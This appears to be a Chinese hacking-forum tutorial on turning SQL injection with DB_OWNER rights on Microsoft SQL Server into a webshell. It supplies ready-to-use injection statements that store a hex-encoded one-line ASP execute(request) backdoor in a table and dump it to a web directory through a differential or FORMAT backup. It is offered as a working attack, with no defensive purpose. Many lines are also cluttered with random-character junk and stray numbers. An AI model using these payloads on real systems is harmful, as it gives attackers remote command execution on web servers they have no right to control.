DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:

/ Y, L5 V1 F9 q& O$ m减少备份文件大小，得到可执行的webshell成功率提高不少
! I) o0 z* `# @1 O; ]' e一利用差异备份
9 |. |3 z5 E  x3 h加一个参数WITH DIFFERENTIAL
1 ~; f% h$ n' @! J5 O
1
- t6 j3 p+ I5 p& W" X2
$ X: V1 b" `: R# \% w" b3
6 l% z8 o) O7 d9 a  R4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
! o9 I: e/ z  H9 }2 D. t/ i+ s/ ]create table [dbo].[xiaolu] ([cmd] [image]);
& U: r- T& B. k& Ginsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
! O; d4 d) i- ^  W7 v0 f3 pdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

8 |# T: m. s% h$ q0 H二利用完全FORMAT
, I1 }" B& c) P* j加一个参数WITH FROMAT
- R& H0 T0 `6 P& y8 m, Q# z! Z4 O有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
% |8 ?. l$ G& P- G
0 p7 F3 R9 I% k2 @5 j: B3 ^1
2
3
2 D2 q( \" D) D+ J4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
. c3 L' K) D) X1 r" X+ Gcreate table [dbo].[xiaolu] ([cmd] [image]);
- U. W) E1 r, n8 ?1 S% L% t4 k6 Zinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
3 b5 S; w+ T6 p# U& ~2 D7 _declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
/ z5 n% d* y( P* a% m# i$ ~: W
! k7 t" Q# Y) i  O( O& i$ E总的来说就是那么简单几句,下面以备份数据库model为例子
- Y6 A% W3 r0 R' O1
% l- ~! a+ c9 K; i  {. Z! M
$ j, S: w/ h7 S3 i- F* L; ~- B1
0 V! C" T# U! O) z" S id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')

1 ?  w! `& p& A! m; x: h- J! H5 j2

1
id=1;backup database model to disk='你的路径‘ with differential,format;--